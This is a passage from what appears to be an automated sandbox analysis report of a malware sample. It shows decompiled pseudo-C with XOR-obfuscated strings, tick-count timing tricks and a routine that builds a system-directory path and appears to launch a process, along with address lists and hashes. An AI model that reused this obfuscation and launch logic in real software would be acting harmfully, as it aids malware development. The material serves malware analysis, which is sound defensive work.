                                                                    									 *(_t320 + 0x13) = ((_t214 -  *(_t320 + 0x13)) * 0x6f >> 0x20) + 0x3c + (_t214 -  *(_t320 + 0x13)) * 0x6f;
                                                                    									if(E0041A830( *_t314, 0xa) != 0) {
                                                                    										goto L7;
                                                                    									}
                                                                    									goto L4;
                                                                    								}
                                                                    							}
                                                                    							__eflags = _t154 & 0x00000002;
                                                                    							if((_t154 & 0x00000002) != 0) {
                                                                    								L21:
                                                                    								_t181 =  *0x447d08; // 0x0
                                                                    								__eflags = _t181 - 0x6d;
                                                                    								if(_t181 >= 0x6d) {
                                                                    									_t182 = _t181 | 0x0000002b;
                                                                    									__eflags = _t182;
                                                                    								} else {
                                                                    									_t182 = _t181 * 0x2f;
                                                                    								}
                                                                    								_t277 =  *(_t320 + 0x1c);
                                                                    								 *0x447d08 = _t182;
                                                                    								_t302 = _t182;
                                                                    								_t246 = 9;
                                                                    								do {
                                                                    									_t246 = _t246 - 1;
                                                                    									__eflags = _t246;
                                                                    									 *(_t320 + 0x1c) = _t277 +  *(_t320 + 0x1c) * 2 + _t302 + _t182 - 0x181f;
                                                                    								} while (__eflags != 0);
                                                                    								E00415A50(_t320 + 0x5c, _t320 + 0x40, __eflags);
                                                                    								_t303 =  *(_t320 + 0x1c);
                                                                    								__eflags = _t303 - 8;
                                                                    								if(_t303 >= 8) {
                                                                    									_t304 = _t303 + 0x53;
                                                                    									__eflags = _t304;
                                                                    								} else {
                                                                    									_t304 = _t303 | 0x00000031;
                                                                    								}
                                                                    								E004108E0(_t320 + 0x94);
                                                                    								_t305 = _t304 + _t304;
                                                                    								E004114B0(_t314, _t320 + 0xd0);
                                                                    								_t321 = _t320 + 8;
                                                                    								__eflags = _t305 - 8;
                                                                    								if(_t305 >= 8) {
                                                                    									_t306 = _t305 + 0x53;
                                                                    									__eflags = _t306;
                                                                    								} else {
                                                                    									_t306 = _t305 | 0x00000031;
                                                                    								}
                                                                    								 *(_t321 + 0x20) = _t306;
                                                                    								E00410DA0(_t321 + 0xb0);
                                                                    								_t320 = _t321 + 4;
                                                                    								E00415840(_t320 + 0x18,  *((char*)(_t321 + 0x17)), 0x61);
                                                                    								_t189 =  *(_t320 + 0x14);
                                                                    								__eflags = 0x00000004 & _t189;
                                                                    								if((0x00000004 & _t189) == 0) {
                                                                    									E00402720(_t320 + 0xd8, _t314 + 0x34, 0, 0xffffffff);
                                                                    									_t251 =  *((intOrPtr*)(_t314 + 0x28));
                                                                    									 *((intOrPtr*)(_t320 + 0xe8)) =  *((intOrPtr*)(_t314 + 0x24));
                                                                    									_t86 = _t320 + 0x14;
                                                                    									 *_t86 =  *(_t320 + 0x14) | 0x00000004;
                                                                    									__eflags =  *_t86;
                                                                    								} else {
                                                                    									_t251 =  *((intOrPtr*)(_t314 + 0x18));
                                                                    									 *((intOrPtr*)(_t320 + 0xe8)) =  *((intOrPtr*)(_t314 + 0x14));
                                                                    								}
                                                                    								_t214 =  *(_t320 + 0x18);
                                                                    								 *((intOrPtr*)(_t320 + 0xf0)) = _t251;
                                                                    								E00415890(_t320 + 0x17, 0, _t214);
                                                                    								_t166 =  *(_t320 + 0x14) | 0x00000001;
                                                                    								goto L43;
                                                                    							}
                                                                    							_t195 = GetTickCount();
                                                                    							__eflags = _t195 & 0x00000001;
                                                                    							if((_t195 & 0x00000001) == 0) {
                                                                    								goto L36;
                                                                    							}
                                                                    							goto L21;
                                                                    						}
                                                                    						_t252 =  *(_t320 + 0x13);
                                                                    						__eflags = 0x27;
                                                                    						_t308 = 0x6f;
                                                                    						do {
                                                                    							_t252 = _t252 + 0x27 + _t214 + 0x5d;
                                                                    							_t308 = _t308 - 1;
                                                                    							__eflags = _t308;
                                                                    						} while (_t308 != 0);
                                                                    						 *(_t320 + 0x13) = _t252;
                                                                    						while(1) {
                                                                    							 *(_t320 + 0x13) = ((_t214 -  *(_t320 + 0x13)) * 0x6f >> 0x20) + 0x3c + (_t214 -  *(_t320 + 0x13)) * 0x6f;
                                                                    							if(E0041A830( *_t314, 0xa) != 0) {
                                                                    								goto L7;
                                                                    							}
                                                                    							goto L4;
                                                                    						}
                                                                    					}
                                                                    					_push(4);
                                                                    					_push(3);
                                                                    					_push(_t320 + 0x2c);
                                                                    					if(E00408590(_t320 + 0x84) != 0) {
                                                                    						E00415840(_t320 + 0x18,  *(_t320 + 0x13), 0x10);
                                                                    						_t201 =  *(_t320 + 0x13);
                                                                    						__eflags = _t201 - 0x4c;
                                                                    						_t214 =  *(_t320 + 0x18);
                                                                    						if(_t201 >= 0x4c) {
                                                                    							 *(_t320 + 0x13) = _t201 ^ 0x0000000c;
                                                                    						} else {
                                                                    							 *(_t320 + 0x13) = _t201 ^ 0x00000071;
                                                                    						}
                                                                    						goto L14;
                                                                    					}
                                                                    					 *(_t320 + 0x13) =  *(_t320 + 0x13) + 0x23;
                                                                    				}
                                                                    			}




















































                                                                    0x00416ed0
                                                                    0x00416ed0
                                                                    0x00416ed2
                                                                    0x00416edd
                                                                    0x00416ede
                                                                    0x00416ee5
                                                                    0x00416ef1
                                                                    0x00416ef9
                                                                    0x00416efd
                                                                    0x00416f06
                                                                    0x00416f0d
                                                                    0x00416f12
                                                                    0x00416f28
                                                                    0x00416f30
                                                                    0x00416f35
                                                                    0x00416f3d
                                                                    0x00416f57
                                                                    0x00416f5d
                                                                    0x00416f65
                                                                    0x00416f6a
                                                                    0x00416f6d
                                                                    0x00416f72
                                                                    0x00416f72
                                                                    0x00416f74
                                                                    0x00416f74
                                                                    0x00416f77
                                                                    0x00416f7e
                                                                    0x00416f82
                                                                    0x00416f95
                                                                    0x00416fa6
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00416fa8
                                                                    0x00416fb4
                                                                    0x00416fd6
                                                                    0x00416fdb
                                                                    0x0041733b
                                                                    0x00417342
                                                                    0x0041734a
                                                                    0x00417353
                                                                    0x00417358
                                                                    0x00417361
                                                                    0x00417367
                                                                    0x00417368
                                                                    0x0041736d
                                                                    0x0041736d
                                                                    0x00417377
                                                                    0x00417379
                                                                    0x00417386
                                                                    0x00417386
                                                                    0x00416fdf
                                                                    0x00416fe6
                                                                    0x00416feb
                                                                    0x00416fed
                                                                    0x00416ff3
                                                                    0x00417006
                                                                    0x0041705e
                                                                    0x0041705e
                                                                    0x00417064
                                                                    0x00417068
                                                                    0x00417075
                                                                    0x0041707a
                                                                    0x0041707c
                                                                    0x004170a5
                                                                    0x004170a9
                                                                    0x004170ab
                                                                    0x004171d9
                                                                    0x004171d9
                                                                    0x004171de
                                                                    0x004171e1
                                                                    0x004171e8
                                                                    0x004171e8
                                                                    0x004171e3
                                                                    0x004171e3
                                                                    0x004171e3
                                                                    0x004171eb
                                                                    0x004171f4
                                                                    0x004171f9
                                                                    0x004171fe
                                                                    0x00417202
                                                                    0x00417205
                                                                    0x00417207
                                                                    0x00417220
                                                                    0x00417229
                                                                    0x0041722c
                                                                    0x0041722f
                                                                    0x0041722f
                                                                    0x00417232
                                                                    0x00417209
                                                                    0x00417209
                                                                    0x0041720c
                                                                    0x0041720c
                                                                    0x0041723d
                                                                    0x00417244
                                                                    0x0041724b
                                                                    0x00417254
                                                                    0x00417254
                                                                    0x00417257
                                                                    0x00417257
                                                                    0x0041725c
                                                                    0x00417262
                                                                    0x00417268
                                                                    0x0041726c
                                                                    0x0041726c
                                                                    0x0041726f
                                                                    0x0041726f
                                                                    0x00417272
                                                                    0x00417277
                                                                    0x0041727e
                                                                    0x00417280
                                                                    0x00417280
                                                                    0x00417280
                                                                    0x00417283
                                                                    0x0041728a
                                                                    0x0041729d
                                                                    0x004172a2
                                                                    0x004172ae
                                                                    0x004172bd
                                                                    0x004172be
                                                                    0x004172c2
                                                                    0x004172ca
                                                                    0x004172cf
                                                                    0x004172d1
                                                                    0x0041731e
                                                                    0x00417323
                                                                    0x00417327
                                                                    0x0041732c
                                                                    0x00416f82
                                                                    0x00416f95
                                                                    0x00416fa6
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00416fa6
                                                                    0x00416f82
                                                                    0x004172d3
                                                                    0x004172dc
                                                                    0x004172dc
                                                                    0x004172de
                                                                    0x004172e3
                                                                    0x004172ee
                                                                    0x004172ee
                                                                    0x004172ef
                                                                    0x004172ef
                                                                    0x004172fa
                                                                    0x004172ff
                                                                    0x00417304
                                                                    0x0041730d
                                                                    0x00416f82
                                                                    0x00416f95
                                                                    0x00416fa6
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00416fa6
                                                                    0x00416f82
                                                                    0x004170b1
                                                                    0x004170b3
                                                                    0x004170c3
                                                                    0x004170c3
                                                                    0x004170c8
                                                                    0x004170cb
                                                                    0x004170d2
                                                                    0x004170d2
                                                                    0x004170cd
                                                                    0x004170cd
                                                                    0x004170cd
                                                                    0x004170d5
                                                                    0x004170da
                                                                    0x004170df
                                                                    0x004170e2
                                                                    0x004170e7
                                                                    0x004170f0
                                                                    0x004170f0
                                                                    0x004170f8
                                                                    0x004170f8
                                                                    0x00417106
                                                                    0x0041710b
                                                                    0x0041710f
                                                                    0x00417113
                                                                    0x0041711a
                                                                    0x0041711a
                                                                    0x00417115
                                                                    0x00417115
                                                                    0x00417115
                                                                    0x00417125
                                                                    0x00417132
                                                                    0x00417134
                                                                    0x00417139
                                                                    0x0041713c
                                                                    0x00417140
                                                                    0x00417147
                                                                    0x00417147
                                                                    0x00417142
                                                                    0x00417142
                                                                    0x00417142
                                                                    0x00417152
                                                                    0x00417156
                                                                    0x00417160
                                                                    0x0041716c
                                                                    0x00417171
                                                                    0x0041717a
                                                                    0x0041717c
                                                                    0x0041719c
                                                                    0x004171a4
                                                                    0x004171a7
                                                                    0x004171ae
                                                                    0x004171ae
                                                                    0x004171ae
                                                                    0x0041717e
                                                                    0x00417181
                                                                    0x00417184
                                                                    0x00417184
                                                                    0x004171b2
                                                                    0x004171c3
                                                                    0x004171cb
                                                                    0x004171d4
                                                                    0x00000000
                                                                    0x004171d4
                                                                    0x004170b5
                                                                    0x004170bb
                                                                    0x004170bd
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004170bd
                                                                    0x0041707e
                                                                    0x00417087
                                                                    0x00417089
                                                                    0x00417090
                                                                    0x00417097
                                                                    0x00417099
                                                                    0x00417099
                                                                    0x00417099
                                                                    0x0041709c
                                                                    0x00416f82
                                                                    0x00416f95
                                                                    0x00416fa6
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00416fa6
                                                                    0x00416f82
                                                                    0x0041700b
                                                                    0x0041700d
                                                                    0x00417013
                                                                    0x00417023
                                                                    0x0041703d
                                                                    0x00417042
                                                                    0x00417046
                                                                    0x00417048
                                                                    0x0041704c
                                                                    0x00417058
                                                                    0x0041704e
                                                                    0x00417050
                                                                    0x00417050
                                                                    0x00000000
                                                                    0x0041704c
                                                                    0x00417025
                                                                    0x00417025

                                                                    APIs
                                                                      • Part of subcall function 0040D1C0: GetTickCount.KERNEL32 ref: 0040D1CA
                                                                      • Part of subcall function 0040D1C0: GetTickCount.KERNEL32 ref: 0040D1D8
                                                                      • Part of subcall function 0040D1C0: GetTickCount.KERNEL32 ref: 0040D1E6
                                                                      • Part of subcall function 0040D1C0: GetTickCount.KERNEL32 ref: 0040D1F4
                                                                    • Sleep.KERNEL32(00000001), ref: 00416F57
                                                                    • GetTickCount.KERNEL32 ref: 004170B5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.557333474.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.557324719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557403915.0000000000430000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000431000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000434000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557460686.0000000000446000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557474141.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557508931.0000000000453000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557537195.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID: CountTick$Sleep
                                                                    • String ID: #
                                                                    • API String ID: 4250438611-1885708031
                                                                    • Opcode ID: 750ed2ea064698ed89a585cf5eb7a660a7a1a2a949ca3c694bd3f9e53b0b3077
                                                                    • Instruction ID: a1ea3fcd721d591e2eafdedace09154b760c8a6e3c127037941cf771bc0379b1
                                                                    • Opcode Fuzzy Hash: 750ed2ea064698ed89a585cf5eb7a660a7a1a2a949ca3c694bd3f9e53b0b3077
                                                                    • Instruction Fuzzy Hash: DDD1D47550C3819BD315DF24D881BEBBBE5AFD9304F00482EF98557382D738998ACB96
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E0041F040(void* __ecx, char _a56, char _a60, char _a152, char _a156, char _a324, char _a348) {
                                                                    				void _v76;
                                                                    				intOrPtr _v84;
                                                                    				void _v88;
                                                                    				char _v92;
                                                                    				char _v94;
                                                                    				char _v95;
                                                                    				char _v96;
                                                                    				char _v97;
                                                                    				char _v98;
                                                                    				char _v99;
                                                                    				char _v100;
                                                                    				char _v101;
                                                                    				char _v102;
                                                                    				char _v103;
                                                                    				char _v104;
                                                                    				char _v105;
                                                                    				char _v106;
                                                                    				char _v107;
                                                                    				char _v108;
                                                                    				char _v109;
                                                                    				char _v110;
                                                                    				char _v111;
                                                                    				char _v112;
                                                                    				char _v113;
                                                                    				char _v114;
                                                                    				char _v115;
                                                                    				char _v116;
                                                                    				char _v117;
                                                                    				char _v118;
                                                                    				char _v119;
                                                                    				char _v120;
                                                                    				char _v121;
                                                                    				char _v122;
                                                                    				char _v123;
                                                                    				char _v124;
                                                                    				char _v125;
                                                                    				char _v126;
                                                                    				char _v127;
                                                                    				char _v128;
                                                                    				char _v129;
                                                                    				char _v130;
                                                                    				char _v131;
                                                                    				char _v132;
                                                                    				char _v136;
                                                                    				char _v137;
                                                                    				char _v138;
                                                                    				char _v139;
                                                                    				char _v140;
                                                                    				char _v141;
                                                                    				char _v142;
                                                                    				char _v143;
                                                                    				char _v144;
                                                                    				char _v145;
                                                                    				char _v146;
                                                                    				char _v147;
                                                                    				char _v148;
                                                                    				void* _t87;
                                                                    				intOrPtr _t93;
                                                                    				short _t94;
                                                                    				void* _t95;
                                                                    				unsigned int _t96;
                                                                    				CHAR* _t118;
                                                                    				int _t121;
                                                                    				void _t125;
                                                                    				void _t126;
                                                                    				signed int _t128;
                                                                    				void* _t138;
                                                                    				short* _t145;
                                                                    				void* _t147;
                                                                    				void* _t156;
                                                                    				signed int _t161;
                                                                    				void* _t163;
                                                                    
                                                                    				_t163 = (_t161 & 0xfffffff8) - 0x90;
                                                                    				_v146 = 0xb9;
                                                                    				_v143 = 0xb9;
                                                                    				_v148 = 0xa7;
                                                                    				_v147 = 0xbe;
                                                                    				_v145 = 0xbb;
                                                                    				_v144 = 0xa4;
                                                                    				_v142 = 0xfd;
                                                                    				_v141 = 0xba;
                                                                    				_v140 = 0xe7;
                                                                    				_v139 = 0xac;
                                                                    				_v138 = 0xb1;
                                                                    				_v137 = 0xac;
                                                                    				_v136 = 0xc9;
                                                                    				_t121 = 0;
                                                                    				do {
                                                                    					 *(_t163 + _t121 + 0x10) =  *(_t163 + _t121 + 0x10) ^ 0x000000c9;
                                                                    					_t121 = _t121 + 1;
                                                                    				} while (_t121 < 0xd);
                                                                    				_v128 = 0xfd;
                                                                    				_v126 = 0xfd;
                                                                    				_v122 = 0xfd;
                                                                    				_v117 = 0xfd;
                                                                    				_v116 = 0xfd;
                                                                    				_v101 = 0xfd;
                                                                    				_v132 = 0xb2;
                                                                    				_v131 = 0xad;
                                                                    				_v130 = 0xa8;
                                                                    				_v129 = 0xab;
                                                                    				_v127 = 0xf0;
                                                                    				_v125 = 0xff;
                                                                    				_v124 = 0xad;
                                                                    				_v123 = 0xe4;
                                                                    				_v121 = 0xf8;
                                                                    				_v120 = 0xaa;
                                                                    				_v119 = 0xfc;
                                                                    				_v118 = 0xe4;
                                                                    				_v115 = 0xf0;
                                                                    				_v114 = 0xfe;
                                                                    				_v113 = 0xe4;
                                                                    				_v112 = 0xa8;
                                                                    				_v111 = 0xf1;
                                                                    				_v110 = 0xf9;
                                                                    				_v109 = 0xa8;
                                                                    				_v108 = 0xe4;
                                                                    				_v107 = 0xfe;
                                                                    				_v106 = 0xab;
                                                                    				_v105 = 0xfc;
                                                                    				_v104 = 0xad;
                                                                    				_v103 = 0xfc;
                                                                    				_v102 = 0xac;
                                                                    				_v100 = 0xf0;
                                                                    				_v99 = 0xfa;
                                                                    				_v98 = 0xac;
                                                                    				_v97 = 0xfe;
                                                                    				_v96 = 0xf0;
                                                                    				_v95 = 0xb4;
                                                                    				_v94 = 0xc9;
                                                                    				_t87 = 0;
                                                                    				do {
                                                                    					 *(_t163 + _t87 + 0x20) =  *(_t163 + _t87 + 0x20) ^ 0x000000c9;
                                                                    					_t87 = _t87 + 1;
                                                                    				} while (_t87 < 0x27);
                                                                    				_t118 = E0041ACD0(E0041AC50(), 8, 0x104);
                                                                    				memset( &_v88, 0, 0x11 << 2);
                                                                    				_v88 = 0x44;
                                                                    				GetSystemDirectoryA(_t118, 0x104);
                                                                    				_t145 = _t118 - 1;
                                                                    				do {
                                                                    					_t93 =  *((intOrPtr*)(_t145 + 1));
                                                                    					_t145 = _t145 + 1;
                                                                    				} while (_t93 != 0);
                                                                    				_t94 =  *0x4301d8; // 0x5c
                                                                    				 *_t145 = _t94;
                                                                    				_t95 =  &_v148;
                                                                    				_t138 = _t95;
                                                                    				do {
                                                                    					_t125 =  *_t95;
                                                                    					_t95 = _t95 + 1;
                                                                    				} while (_t125 != 0);
                                                                    				_t96 = _t95 - _t138;
                                                                    				_t147 = _t118 - 1;
                                                                    				do {
                                                                    					_t126 =  *(_t147 + 1);
                                                                    					_t147 = _t147 + 1;
                                                                    				} while (_t126 != 0);
                                                                    				_t128 = _t96 >> 2;
                                                                    				_t156 = _t138;
                                                                    				memcpy(_t156 + _t128 + _t128, _t156, memcpy(_t147, _t156, _t128 << 2) & 0x00000003);
                                                                    				memset( &_v76, 0, 0x11 << 2);
                                                                    				_t70 =  &_a56; // 0x0
                                                                    				_v76 = 0x44;
                                                                    				if( *_t70 == 0) {
                                                                    					L12:
                                                                    					_t73 =  &_a152; // 0x0
                                                                    					if( *_t73 == 0) {
                                                                    						L19:
                                                                    						E0041AD50(E0041AC50(), 0, _t118);
                                                                    						return 1;
                                                                    					}
                                                                    					_t74 =  &_a156; // 0x0
                                                                    					if( *_t74 != 0) {
                                                                    						goto L19;
                                                                    					}
                                                                    					L14:
                                                                    					_t75 =  &_a324; // 0x0
                                                                    					if( *_t75 == 0) {
                                                                    						_a324 = E0041A7A0(0, 1, 0,  &_v132);
                                                                    					}
                                                                    					_t78 =  &_a348; // 0x0
                                                                    					if( *_t78 == 0 && E0041B070(_t118, 0, 0, 0, 1, 0, 0, 0,  &_v76,  &_v92) != 0) {
                                                                    						_a348 = _v84;
                                                                    						E0041A8E0(_v92);
                                                                    						E0041A8E0(_v92);
                                                                    					}
                                                                    					goto L19;
                                                                    				}
                                                                    				_t72 =  &_a60; // 0x0
                                                                    				if( *_t72 == 0) {
                                                                    					goto L14;
                                                                    				}
                                                                    				goto L12;
                                                                    			}











































































                                                                    0x0041f046
                                                                    0x0041f054
                                                                    0x0041f058
                                                                    0x0041f05e
                                                                    0x0041f063
                                                                    0x0041f068
                                                                    0x0041f06d
                                                                    0x0041f072
                                                                    0x0041f076
                                                                    0x0041f07b
                                                                    0x0041f080
                                                                    0x0041f085
                                                                    0x0041f08a
                                                                    0x0041f08f
                                                                    0x0041f094
                                                                    0x0041f096
                                                                    0x0041f096
                                                                    0x0041f09b
                                                                    0x0041f09c
                                                                    0x0041f0a7
                                                                    0x0041f0ab
                                                                    0x0041f0af
                                                                    0x0041f0b3
                                                                    0x0041f0b7
                                                                    0x0041f0bb
                                                                    0x0041f0bf
                                                                    0x0041f0c4
                                                                    0x0041f0c9
                                                                    0x0041f0ce
                                                                    0x0041f0d3
                                                                    0x0041f0d7
                                                                    0x0041f0dc
                                                                    0x0041f0e1
                                                                    0x0041f0e5
                                                                    0x0041f0ea
                                                                    0x0041f0ef
                                                                    0x0041f0f4
                                                                    0x0041f0f8
                                                                    0x0041f0fc
                                                                    0x0041f100
                                                                    0x0041f104
                                                                    0x0041f109
                                                                    0x0041f10e
                                                                    0x0041f113
                                                                    0x0041f118
                                                                    0x0041f11c
                                                                    0x0041f120
                                                                    0x0041f125
                                                                    0x0041f12a
                                                                    0x0041f12f
                                                                    0x0041f134
                                                                    0x0041f139
                                                                    0x0041f13d
                                                                    0x0041f142
                                                                    0x0041f147
                                                                    0x0041f14b
                                                                    0x0041f14f
                                                                    0x0041f154
                                                                    0x0041f159
                                                                    0x0041f160
                                                                    0x0041f160
                                                                    0x0041f165
                                                                    0x0041f166
                                                                    0x0041f17d
                                                                    0x0041f18f
                                                                    0x0041f192
                                                                    0x0041f19a
                                                                    0x0041f1a2
                                                                    0x0041f1a3
                                                                    0x0041f1a3
                                                                    0x0041f1a6
                                                                    0x0041f1a7
                                                                    0x0041f1ab
                                                                    0x0041f1b1
                                                                    0x0041f1b4
                                                                    0x0041f1b8
                                                                    0x0041f1c0
                                                                    0x0041f1c0
                                                                    0x0041f1c2
                                                                    0x0041f1c3
                                                                    0x0041f1c9
                                                                    0x0041f1cb
                                                                    0x0041f1d0
                                                                    0x0041f1d0
                                                                    0x0041f1d3
                                                                    0x0041f1d4
                                                                    0x0041f1da
                                                                    0x0041f1dd
                                                                    0x0041f1e6
                                                                    0x0041f1f3
                                                                    0x0041f1f5
                                                                    0x0041f1fa
                                                                    0x0041f202
                                                                    0x0041f20b
                                                                    0x0041f20b
                                                                    0x0041f213
                                                                    0x0041f289
                                                                    0x0041f292
                                                                    0x0041f2a3
                                                                    0x0041f2a3
                                                                    0x0041f215
                                                                    0x0041f21d
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0041f21f
                                                                    0x0041f21f
                                                                    0x0041f227
                                                                    0x0041f239
                                                                    0x0041f239
                                                                    0x0041f23f
                                                                    0x0041f247
                                                                    0x0041f274
                                                                    0x0041f27a
                                                                    0x0041f284
                                                                    0x0041f284
                                                                    0x00000000
                                                                    0x0041f247
                                                                    0x0041f204
                                                                    0x0041f209
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000

                                                                    APIs
                                                                    • GetSystemDirectoryA.KERNEL32 ref: 0041F19A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.557333474.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.557324719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557403915.0000000000430000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000431000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000434000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557460686.0000000000446000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557474141.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557508931.0000000000453000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557537195.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID: DirectorySystem
                                                                    • String ID: D$D
                                                                    • API String ID: 2188284642-143366177
                                                                    • Opcode ID: aa7af0bf25e92ba6f468edf1311c75f66fb8aa6ae26c8a848d7b3fb8baf1615f
                                                                    • Instruction ID: 35f7fd7dbea129be8c2d06b6f87f8363cfca897c6f7918c03e147ac4b890d4d7
                                                                    • Opcode Fuzzy Hash: aa7af0bf25e92ba6f468edf1311c75f66fb8aa6ae26c8a848d7b3fb8baf1615f
                                                                    • Instruction Fuzzy Hash: 85714B3120C7C29AD321CA7C488478BBFE15BA7224F480B9DF5E49B3E2D255C54AC36B
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 96%
                                                                    			E0042BEA0(signed int __eax, void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                    				void* __ebx;
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				void* __ebp;
                                                                    				signed int _t44;
                                                                    				signed int _t48;
                                                                    				signed int _t63;
                                                                    				signed int _t66;
                                                                    				signed int _t68;
                                                                    				intOrPtr _t70;
                                                                    				signed char _t74;
                                                                    				signed char _t76;
                                                                    				signed int _t94;
                                                                    				intOrPtr _t95;
                                                                    				void* _t96;
                                                                    				void* _t97;
                                                                    				void* _t98;
                                                                    
                                                                    				_t44 = __eax;
                                                                    				_t95 = _a4;
                                                                    				if( *((intOrPtr*)(_t95 + 0x84)) == 0) {
                                                                    					__eflags =  *(_t95 + 0x80);
                                                                    					if( *(_t95 + 0x80) == 0) {
                                                                    						E004282F0(_t95 + 0x30, 0, 0x38);
                                                                    						E0042B7FA(_t95);
                                                                    						_t48 =  *(_t95 + 0x24);
                                                                    						_t74 =  *0x448626; // 0x0
                                                                    						_t98 = _t97 + 0x10;
                                                                    						__eflags = _t48 - ( *(_t95 + 0x1a) & 0x0000ffff);
                                                                    						if(__eflags == 0) {
                                                                    							_t68 = _t48 + 0x20;
                                                                    							 *(_t95 + 0x24) = _t68;
                                                                    							_push(_t68 * 0x38);
                                                                    							_push( *((intOrPtr*)(_t95 + 0x7c)));
                                                                    							_t70 = E004251E9(_t74, 0, _t95, __eflags);
                                                                    							__eflags = ( *(_t95 + 0x1a) & 0x0000ffff) * 0x38 + _t70;
                                                                    							 *((intOrPtr*)(_t95 + 0x7c)) = _t70;
                                                                    							E004282F0(( *(_t95 + 0x1a) & 0x0000ffff) * 0x38 + _t70, 0, 0x700);
                                                                    							_t98 = _t98 + 0x14;
                                                                    						}
                                                                    						_t94 = ( *(_t95 + 0x1a) & 0x0000ffff) * 0x38 +  *((intOrPtr*)(_t95 + 0x7c));
                                                                    						 *(_t95 + 0x1a) = 1;
                                                                    						 *((intOrPtr*)(_t94 + 0x28)) = E00422EEB(E00422F20(_a8) + 1);
                                                                    						 *((intOrPtr*)(_t94 + 0x24)) = E0042B7BD(_t95);
                                                                    						E00423FB0( *((intOrPtr*)(_t94 + 0x28)), _a8);
                                                                    						 *(_t95 + 0x80) = _t94;
                                                                    						_t76 = _t74 + (_t74 ^ 0x00000064) * 0x16 + (_t74 + (_t74 ^ 0x00000064) * 0x00000016 ^ 0x0000007e) * 0x16;
                                                                    						_t63 = E0042BCE8(0x16, _t94, _a12);
                                                                    						__eflags = _t63;
                                                                    						if(__eflags == 0) {
                                                                    							 *(_t95 + 0x28) =  *(_t95 + 0x28) & 0x00000000;
                                                                    							E0042C11A(_t76, 0x16, _t96, __eflags, _t95, _t94);
                                                                    							 *0x448627 =  *0x448627 & _t76;
                                                                    							 *((intOrPtr*)(_t95 + 0x40)) =  *((intOrPtr*)(_t95 + 0x74));
                                                                    							 *((intOrPtr*)(_t95 + 0x6c)) = 0;
                                                                    							 *((intOrPtr*)(_t95 + 0x34)) = 0;
                                                                    							 *((intOrPtr*)(_t95 + 0x3c)) =  *((intOrPtr*)(_t95 + 0x78));
                                                                    							 *((intOrPtr*)(_t95 + 0x38)) = 0;
                                                                    							 *((intOrPtr*)(_t95 + 0x44)) = 0;
                                                                    							__eflags =  *((short*)(_t94 + 0xa)) - 8;
                                                                    							if( *((short*)(_t94 + 0xa)) != 8) {
                                                                    								L11:
                                                                    								__eflags =  *0x448626 - 0x3a;
                                                                    								if( *0x448626 >= 0x3a) {
                                                                    									 *0x448626 =  *0x448626 ^ 0x00000014;
                                                                    									__eflags =  *0x448626;
                                                                    								} else {
                                                                    									 *0x448626 =  *0x448626 | 0x00000074;
                                                                    								}
                                                                    								 *((char*)(_t95 + 0x2c)) = 1;
                                                                    								_t66 = 0;
                                                                    								__eflags = 0;
                                                                    								goto L15;
                                                                    							}
                                                                    							 *((intOrPtr*)(_t95 + 0x58)) = 0;
                                                                    							_t63 = E0042DAB9(_t95 + 0x30, _a12, 8, 0xfffffff1, 8, 0, "1.2.3", 0x38);
                                                                    							__eflags = _t63;
                                                                    							if(_t63 != 0) {
                                                                    								goto L8;
                                                                    							}
                                                                    							goto L11;
                                                                    						} else {
                                                                    							L8:
                                                                    							_t66 = _t63 | 0xffffffff;
                                                                    							L15:
                                                                    							return _t66;
                                                                    						}
                                                                    					}
                                                                    					 *0x448604 = 2;
                                                                    					L4:
                                                                    					return _t44 | 0xffffffff;
                                                                    				}
                                                                    				 *0x448604 = 5;
                                                                    				goto L4;
                                                                    			}




















                                                                    0x0042bea0
                                                                    0x0042bea4
                                                                    0x0042beb0
                                                                    0x0042bebe
                                                                    0x0042bec4
                                                                    0x0042bee0
